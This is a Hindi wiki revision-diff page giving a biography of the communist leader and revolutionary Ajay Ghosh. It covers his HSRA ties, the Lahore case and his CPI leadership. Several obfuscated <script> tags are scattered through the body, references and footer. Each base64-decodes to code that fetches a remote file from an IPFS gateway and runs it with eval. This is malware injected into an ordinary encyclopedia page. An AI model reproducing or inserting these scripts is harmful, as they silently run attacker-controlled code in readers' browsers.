Difference between revisions of "अजय घोष"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "सजा " to "सज़ा ")
Line 1: Line 1:
*अजय घोष का जन्म 1880 ई. में [[पश्चिम बंगाल]] के मिहिजाम नामक स्थान पर हुआ। उन्होंने [[इलाहाबाद]] में उच्च शिक्षा प्राप्त की।
+
{{सूचना बक्सा स्वतन्त्रता सेनानी
*ये हिन्दुस्तान सोशलिस्ट रिपब्लिकलन एसोसिएशन के सक्रिय सदस्य रहे तथा 1928 ई. में सरदार [[भगत सिंह]], [[सुखदेव]], [[राजगुरु]] एवं [[बटुकेश्वर दत्त]] के साथ कारावास गए एवं लाहौर काण्ड में इन्हें भी अभियुक्त के रूप में सज़ा दी गई।  
+
|चित्र=Blankimage.jpg
*1933 ई. में इन्होंने कम्युनिस्ट पार्टी से स्वयं को जोड़ लिया तथा 1951 ई. में इन्हें इसका महासचिव निर्वाचित किया गया।
+
|चित्र का नाम=अजय घोष
*स्वतन्त्र [[भारत]] में प्रथम आम चुनाव में उनके दल को अच्छी सफलता मिली।
+
|पूरा नाम=अजय घोष
*1962 ई. में श्री घोष का निधन हो गया।
+
|अन्य नाम=
*इस प्रकार श्री घोष की जीवनयात्रा एक क्रांतिकारी से अन्तर्राष्ट्रीय स्तर के साम्यवादी तक की रही।
+
|जन्म=[[20 फ़रवरी]], [[1909]]
 +
|जन्म भूमि=चित्तरंजन, [[बंगाल]]
 +
|मृत्यु=[[11 जनवरी]], [[1962]]
 +
|मृत्यु स्थान=
 +
|मृत्यु कारण=[[क्षय रोग]] के कारण
 +
|अभिभावक=पिता- शचीन्द्र नाथ घोष और माता- सुधान्शु बाला
 +
|पति/पत्नी=
 +
|संतान=
 +
|स्मारक=
 +
|क़ब्र=
 +
|नागरिकता=भारतीय
 +
|प्रसिद्धि=स्वतंत्रता सेनानी
 +
|धर्म=हिंदु
 +
|आंदोलन=
 +
|जेल यात्रा=अजय घोष सांडर्स की हत्या केंद्रीय असेम्बलि में बम फेंकने के कारण जेल गये।
 +
|कार्य काल=
 +
|विद्यालय=
 +
|शिक्षा=स्नातक
 +
|पुरस्कार-उपाधि=
 +
|विशेष योगदान=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=अजय घोष पर सबसे अधिक प्रभाव कम्युनिष्ट नेता श्रीनिवास सर देसाई का पड़ा और वे भारतीय कम्युनिष्ट पार्टी में साम्मिलित हो गये।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''अजय घोष''' ([[अंग्रेज़ी]]: ''Ajoy Ghosh'', जन्म: [[20 फ़रवरी]], [[1909]], चित्तरंजन, ([[बंगाल]]); मृत्यु: [[11 जनवरी]], [[1962]]) भारतीय कम्युनिस्ट पार्टी के नेता थे। ये हिन्दुस्तान सोशलिस्ट रिपब्लिकलन एसोसिएशन के सक्रिय सदस्य रहे तथा [[1928]] ई. में सरदार [[भगत सिंह]], [[सुखदेव]], [[राजगुरु]] एवं [[बटुकेश्वर दत्त]] के साथ कारावास गए एवं लाहौर काण्ड में इन्हें भी अभियुक्त के रूप में सज़ा दी गई।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=14|url=}}</ref>
 +
==परिचय==
 +
प्रसिद्ध कम्युनिस्ट नेता अजय घोष का जन्म 20 फ़रवरी 1909 ई. को चित्तरंजन (बंगाल) में हुआ था। जहां अजय नाम की एक नदी है। उनके बाबा ने उस नदी के नाम पर ही उनका नाम अजय रख दिया था। अजय घोष के पिता का नाम शचीन्द्र नाथ घोष था, जो [[कानपुर]] के प्रतिष्ठित चिकित्सक थे। इनकी माँ का नाम सुधान्शु बाला था। अजय चार भाई और दो बहन थे। अजय घोष की शिक्षा पहले कानपुर फिर [[इलाहाबाद विश्वविद्यालय]] में हुई। अजय घोष ने इलाहाबाद से बीएससी पास किया था।
 +
==क्रांतिकारी जीवन==
 +
अजय घोष [[1923]] में सरदार [[भगत सिंह|भगतसिंह]], [[चंद्रशेखर आज़ाद]], [[बटुकेश्वर दत्त]] आदि के सम्पर्क में आये और क्रांतिकारी दल 'हिंदुस्तान सोशलिस्ट रिपब्लिकेशन एसोसिएशन के सदस्य बन गए। [[1928]] में सांडर्स की हत्या और [[1929]] में केंद्रीय असेम्बलि में बम फेंकने के बाद जब द्वीतीय लाहौर षड्यंत्र केस के नाम से भगतसिंह आदि पर मुकदमा चला तो उस मुक्कदमे में अभियुक्त अजय घोष भी सम्मिलित थे। किंतु उनके विरुद्ध पर्याप्त सबूत न मिलने के कारण बाद में वे रिहा कर दिये गये।
 +
==कम्युनिस्ट नेता==
 +
अजय घोष विचाराधीन कैदी के रूप में जेल में रहने के कारण कम्युनिस्ट विचारों के सम्पर्क में आए। [[1931]] की कराची कांग्रेस में उनका [[सुभाषचंद्र बोस]] से भी परिचय हुआ। फिर भी उनके ऊपर सबसे अधिक प्रभाव कम्युनिष्ट नेता श्रीनिवास सर देसाई का पड़ा और वे भारतीय कम्युनिष्ट पार्टी में साम्मिलित हो गये। [[1936]] में अजय घोष कम्युनिष्ट पार्टी की पोलितब्यूरो के सदस्य बने और [[1951]] से [[1952]] तक पार्टी जनरल सेक्रेटरी रहे। वे पार्टी के प्रमुख पत्र 'दि नेस्शनल फ्रंट' के संपादकीय मंडल में भी थे और उन्होंने कई पुस्तिकाएं भी लिखीं।
 +
==निधन==
 +
अजय घोष जब [[1941]] में देवली कैप्म जेल में बंदी थे, तब उन्हें [[क्षय रोग]] लग गया और इसी से [[11 जनवरी]], [[1962]] को उनका देहांत हो गया।
 +
 
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 13:02, 16 May 2017

ajay ghosh
poora nam ajay ghosh
janm 20 faravari, 1909
janm bhoomi chittaranjan, bangal
mrityu 11 janavari, 1962
mrityu karan kshay rog ke karan
abhibhavak pita- shachindr nath ghosh aur mata- sudhanshu bala
nagarikata bharatiy
prasiddhi svatantrata senani
dharm hiandu
jel yatra ajay ghosh saandars ki hatya keandriy asembali mean bam pheankane ke karan jel gaye.
shiksha snatak
any janakari ajay ghosh par sabase adhik prabhav kamyunisht neta shrinivas sar desaee ka p da aur ve bharatiy kamyunisht parti mean sammilit ho gaye.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ajay ghosh (aangrezi: Ajoy Ghosh, janm: 20 faravari, 1909, chittaranjan, (bangal); mrityu: 11 janavari, 1962) bharatiy kamyunist parti ke neta the. ye hindustan soshalist ripablikalan esosieshan ke sakriy sadasy rahe tatha 1928 ee. mean saradar bhagat sianh, sukhadev, rajaguru evan batukeshvar datt ke sath karavas ge evan lahaur kand mean inhean bhi abhiyukt ke roop mean saza di gee.[1]

parichay

prasiddh kamyunist neta ajay ghosh ka janm 20 faravari 1909 ee. ko chittaranjan (bangal) mean hua tha. jahaan ajay nam ki ek nadi hai. unake baba ne us nadi ke nam par hi unaka nam ajay rakh diya tha. ajay ghosh ke pita ka nam shachindr nath ghosh tha, jo kanapur ke pratishthit chikitsak the. inaki maan ka nam sudhanshu bala tha. ajay char bhaee aur do bahan the. ajay ghosh ki shiksha pahale kanapur phir ilahabad vishvavidyalay mean huee. ajay ghosh ne ilahabad se biesasi pas kiya tha.

kraantikari jivan

ajay ghosh 1923 mean saradar bhagatasianh, chandrashekhar azad, batukeshvar datt adi ke sampark mean aye aur kraantikari dal 'hiandustan soshalist ripablikeshan esosieshan ke sadasy ban ge. 1928 mean saandars ki hatya aur 1929 mean keandriy asembali mean bam pheankane ke bad jab dvitiy lahaur shadyantr kes ke nam se bhagatasianh adi par mukadama chala to us mukkadame mean abhiyukt ajay ghosh bhi sammilit the. kiantu unake viruddh paryapt saboot n milane ke karan bad mean ve riha kar diye gaye.

kamyunist neta

ajay ghosh vicharadhin kaidi ke roop mean jel mean rahane ke karan kamyunist vicharoan ke sampark mean ae. 1931 ki karachi kaangres mean unaka subhashachandr bos se bhi parichay hua. phir bhi unake oopar sabase adhik prabhav kamyunisht neta shrinivas sar desaee ka p da aur ve bharatiy kamyunisht parti mean sammilit ho gaye. 1936 mean ajay ghosh kamyunisht parti ki politabyooro ke sadasy bane aur 1951 se 1952 tak parti janaral sekretari rahe. ve parti ke pramukh patr 'di nesshanal phrant' ke sanpadakiy mandal mean bhi the aur unhoanne kee pustikaean bhi likhian.

nidhan

ajay ghosh jab 1941 mean devali kaipm jel mean bandi the, tab unhean kshay rog lag gaya aur isi se 11 janavari, 1962 ko unaka dehaant ho gaya.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 2.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  1. bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 14 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>